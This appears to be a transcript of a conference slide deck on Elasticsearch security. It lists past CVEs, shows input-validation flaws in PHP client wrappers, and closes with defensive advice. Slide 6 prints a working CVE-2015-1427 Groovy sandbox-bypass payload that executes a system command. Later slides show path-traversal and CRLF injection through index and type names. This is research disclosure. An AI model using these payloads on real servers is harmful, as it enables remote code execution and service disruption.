dcm#8 elastic search
TRANSCRIPT
![Page 1: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/1.jpg)
ElasticSearch:Is it secure?
@d0znppWallarm research
![Page 2: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/2.jpg)
What is ElasticSearch?“Elasticsearch is a distributed RESTful search engine built for the cloud.“Official repo: https://github.com/elastic/elasticsearch
Distributed Lucene instances broker● RESTful API● Native Java API
Clients: https://www.elastic.co/guide/index.html
![Page 3: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/3.jpg)
Previous works● NoSQL Injection for Elasticsearch Kindle Edition by
Gary Drocella http://goo.gl/OnfMOz=> ACL to 9200 and 9300● NoSQL Injections: Moving Beyond 'or '1'='1'. Matt
Bromiley Derbycon 2014 http://goo.gl/UBh42h=> do not produce JSON by strings concatenation● Securing ElasticSearch http://goo.gl/Ik3023 => Use Nginx to provide BasicAuth and other advices
![Page 4: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/4.jpg)
![Page 5: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/5.jpg)
Previous bugs: 5 CVEhttps://www.elastic.co/community/security ● CVE-2015-4165 is not disclosed yet ;(“All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.”● CVE-2015-3337 path trav. https://goo.gl/YWwu3a ● CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC ● CVE-2014-6439 CORS issue https://goo.gl/7kMxod ● CVE-2014-3120 Java RCE https://goo.gl/iZL5L8
![Page 6: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/6.jpg)
Sandbox bypass 1427{ "size":1, "script_fields":{ "lupin":{ "script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()" } }}
![Page 7: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/7.jpg)
What is my point?BugBountyhttps://research.facebook.com/search?q=a%20 200https://research.facebook.com/search?q=a%22 500
$1000 reward for injection into JSON to ElasticSearch
But it might be RCE...
![Page 8: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/8.jpg)
What is my point?● Want to hack it through web-applications● Because it’s really rare case when ES is present at
network perimeter● To check wrappers for different platforms for input
validation attacks● Yes, the same as with Memcached injections https:
//goo.gl/9qV620 [BHUS-14]
![Page 9: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/9.jpg)
4 popular clients (wrappers)http://jolicode.com/blog/elasticsearch-php-clients-test-drive
● Original (elasticsearch)● Sherlock● Elastica● Nervetattoo
Let’s start from PHP
![Page 10: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/10.jpg)
● RESTful tricks (while user data at URL ../ et al.)● JSON syntax breakers ( \ “ } { ] [ )● Native Java API● Filename tricks (each index is a folder with the
same name). I suggests that it is CVE-2015-4165 vector ;)
Input validation kinds
![Page 11: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/11.jpg)
● RESTful tricks (while user data at URL ../ et al.)● JSON syntax breakers ( \ “ } { ] [ )● Native Java API <- Only about RESTful clients now● Filename tricks (each index is a folder with the
same name). I suggests that it is CVE-2015-4165 vector ;) <- ES internals, not clients
Input validation kinds
![Page 12: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/12.jpg)
● All URI parts goes through PHP urlencode(). But dot (0x2e) IS NOT encoded by RFC● json_encode protects from injections into values
$params = array();$params['body'] = array('testField' => 'abc');$params['index'] = '..';$params['type'] = '_shutdown';// Document will be indexed to my_index/my_type/<autogenerated_id>$ret = $client->index($params);
elasticsearch original
![Page 13: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/13.jpg)
● URI parts “as is”● json_encode protects from injections into values
$results = $es ->setIndex("what/../do/you/want!/") ->setType("and/../here/also!") ->search('title:cool&key=value&script_fields');//CVE
nervetattoo
![Page 14: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/14.jpg)
But it’s a raw socket, baby!
$results = $es ->setIndex(" HTTP/1.1\r\n…”script”:”...”") // CVE ->setType("my_type") ->search('title:cool');
nervetattoo
![Page 15: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/15.jpg)
● Use DSL methods● Index name and type are not for users● Do not concatenate strings to JSON● Always filter data before putting into wrappers
Conclusions
![Page 16: Dcm#8 elastic search](https://reader031.vdocuments.us/reader031/viewer/2022021800/587f517a1a28ab0d378b54bd/html5/thumbnails/16.jpg)
https://twitter.com/d0znppblog.wallarm.com
Thx!